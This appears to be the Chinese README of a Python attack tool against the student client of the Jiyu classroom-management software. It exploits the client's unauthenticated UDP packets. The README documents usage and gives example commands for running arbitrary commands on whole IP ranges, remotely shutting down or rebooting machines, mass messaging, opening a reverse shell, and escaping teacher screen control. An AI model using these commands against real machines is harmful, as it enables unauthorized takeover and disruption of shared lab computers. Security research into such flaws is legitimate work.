- 因为极域的学生端没有对接收到的udp包做(=・ω・=)身份验证,导致了我们可以构造特定的数据包让学生端来执行,从而实现命令执行攻击机房内上线的任意学生端机器。
- Python3
v1.3
- 脱离/恢复屏幕控制
- 支持反弹shell
v1.2
- 修复bug
v1.1
- -g 选项支持获取学生端监听的端口
v1.0
- 首次提交
Usage: Jiyu_udp_attack.py -ip ip_address -p port -msg/-c/-r/-s xxx
-ip ip addres IP地址 example: -ip 192.168.80.23
192.168.80.122/24
-p port, default = 4705 端口,默认为4705
-msg send message 发送消息 -msg HelloWord!
-c command 命令 -c "cmd.exe /c ipconfig"
calc.exe
-r reboot 重启
-s shutdown 关机
-l loop * times, default = 1 循环次数,默认为1
-t loop interval, default = 22 s 循环时间间隔,默认是22秒
-------------------- Extra Options --------------------
-nc 反弹shell,使用命令exit退出
-g single options, Gets the current Intranet IP and student
client possible ports.
独立选项,获取当前的ip地址以及学生端监听的端口。
If choose this options, other are become invalid.
如果选择了这个选项,其他选项将会失效。
-break 独立选项,脱离屏幕控制,需要管理员权限
-continue 独立选项,恢复屏幕控制
python Jiyu_udp_attack.py -g
当前运行权限需为管理员权限,主要用于开启MpsSvc服务
python Jiyu_udp_attack.py -break
python Jiyu_udp_attack.py -continue
向IP地址为192.168.80.12的机器发送一条内容为"hello,baby!"的消息
python Jiyu_udp_attack.py -ip 192.168.80.12 -p -msg "hello,baby!"
给192.168.80.12到192.168.80.137弹一个计算器
python Jiyu_udp_attack.py -ip 192.168.80.12-137 -p -c calc.exe
反弹shell时,IP只能为某个机器IP,不能批量反弹,而且机器需要出网 因为已经实现批量的任意命令执行,考虑到批量反弹也没啥意义,遂不添加
python Jiyu_udp_attack.py -ip 192.168.80.12 -p -nc
关机
python Jiyu_udp_attack.py -ip 192.168.80.12 -p -s
重启
python Jiyu_udp_attack.py -ip 192.168.80.12 -p -r
利用循环持续发送消息
1-254的机器会收到一条"hello,baby!"的消息,50s后会继续执行,共执行3次
python Jiyu_udp_attack.py -ip 192.168.80.23/24 -p -msg "hello,baby!" -l 3 -t 50